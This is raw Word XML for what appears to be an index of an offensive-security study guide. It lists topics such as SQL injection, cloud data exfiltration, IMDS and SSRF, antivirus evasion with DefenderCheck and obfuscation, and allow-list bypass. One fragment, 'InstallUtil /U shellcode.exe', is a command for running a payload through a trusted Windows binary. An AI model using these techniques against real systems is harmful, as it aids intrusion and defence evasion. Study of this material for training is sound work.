                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2FB4CA7A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2912A835" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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67C9CA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More than a Web </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vunerability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8A1DBE" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6368ED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9F8E2FC" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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7DFA0418" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6A2A4B94" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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3D9D9AF6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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0D0CA124" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777"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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B648547" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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002E92EF" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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 Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0540B5DC" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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4C39A269" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68D63FD7" w14:textId="0F57C97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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5C001B" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A7D0651" w14:textId="1EF7B8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1BD76099" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A186A23" w14:textId="35D796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75ACB24E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D414242" w14:textId="207BB5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6DE158B3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A1985D" w14:textId="2AAD95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425EE5E7" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA698A6" w14:textId="44E71B9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011862F3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7914BBCB" w14:textId="604B9E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SQL Union Statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B7542D3" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9157AB" w14:textId="711A81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1F2266CB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F98BF8C" w14:textId="4FF9EA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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F00608B" w14:textId="20D923A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08914722" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CE4906" w14:textId="41A9E60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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D42566" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46AB9910" w14:textId="4538EAD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73609608" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4862A510" w14:textId="2DEB1481"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Importan</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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B633C1E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7906148D" w14:textId="339751D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15C749E8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B68AF4F" w14:textId="2E7E70E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Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A1A5405" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F163A5A" w14:textId="4F2C77D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25B29BC" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="196B0D8B" w14:textId="43BE38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 SQL Does Not Escape </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vunerability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF3532E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CAE2B4" w14:textId="77FEEDF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1D97D9E6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5CF7A6" w14:textId="737D9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2F9579CA" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146E1619" w14:textId="09FBFBA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E527D25" w14:textId="14E195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113D502A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658EFDC8" w14:textId="3376944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Defenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39AAC875" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D9126F" w14:textId="22F287F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DA515AD" w14:textId="2D1E1C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35D28C36" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78390537" w14:textId="67222E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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FD76271" w14:textId="4D57EFF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ED36305" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6959C822" w14:textId="256A0F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345FBC5C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C9E080" w14:textId="419CD42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77C6690C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E8A87F7" w14:textId="70F078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Exfiltrating Data from Cloud Targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438EDDB4" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ADC2D76" w14:textId="3882DF3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41E86FB5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11B8EF64" w14:textId="543CEC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7EC496E2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DD47D9" w14:textId="0FB90F2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4D8B185B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D12458E" w14:textId="40373C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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EBE7ECB" w14:textId="498809EA"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6B4F4DEB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3232CC" w14:textId="22180B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IMDS Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CD3B0D9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40344EAC" w14:textId="02F1245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92</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="2481B584" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C6D24F5" w14:textId="0F70DA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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C771A3D" w14:textId="780ABD6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2DC286C5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F1D5E99" w14:textId="777BE3C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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C2DEA9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02E4D363" w14:textId="4F11A01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76E6A574" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AB8F32F" w14:textId="66DD28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SSRF and IMDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44560DB8" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="345915CD" w14:textId="72378A9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95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="0EE382CF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBA5705" w14:textId="40C254D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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C98B92" w14:textId="057FAF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409EF9F8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="491E0B40" w14:textId="7A3D48E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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CC7BD9" w14:textId="0E6E017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A18716" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2DE8647B" w14:textId="1C233B8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DefenderCheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B603EBA" w14:textId="7777777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 Uses a high/low strategy, splitting the file into pieces and scanning repeatedly until the smallest data chunk is found that triggers a threat alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDE0760" w14:textId="2D3B1D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6CDC8EA" w14:textId="560D32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7F8F3B96" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C814CF" w14:textId="0EAFBA6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Evation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> through Code wrapping and Obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10D31D6C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E1C7202" w14:textId="4FF4218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73941272" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34EDD743" w14:textId="068FE8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Application Allow Lists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2368033A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68509266" w14:textId="63B8591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6EE58860" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12949355" w14:textId="59DC13B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Reuses tools and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ultilities</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> already permitted on the target system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E268FBB" w14:textId="323EC80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50E0CDC0" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="76ADBCFD" w14:textId="6AED72A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Microsoft.NET </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>InstallUtil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="735C23A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InstallUtil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> /U shellcode.exe</w:t>
            </w:r>
          </w:p>
